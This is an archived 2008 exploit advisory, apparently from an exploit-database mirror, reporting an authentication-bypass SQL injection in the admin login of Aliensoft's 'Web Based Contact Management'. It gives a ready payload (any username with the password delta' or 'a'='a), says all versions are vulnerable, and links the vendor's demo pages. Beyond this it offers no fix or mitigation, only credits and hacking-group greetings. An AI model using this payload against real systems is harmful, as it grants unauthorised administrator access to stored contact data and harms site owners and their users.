[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Rae Media Contact MS (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-12-03
# Author : b3hz4d
# Previous Title : ASP User Engine .NET Remote Database Disclosure Vulnerability
# Next Title : Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

	      PASS: delta' or 'a'='a
 
                
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# www.Syue.com [2008-12-03]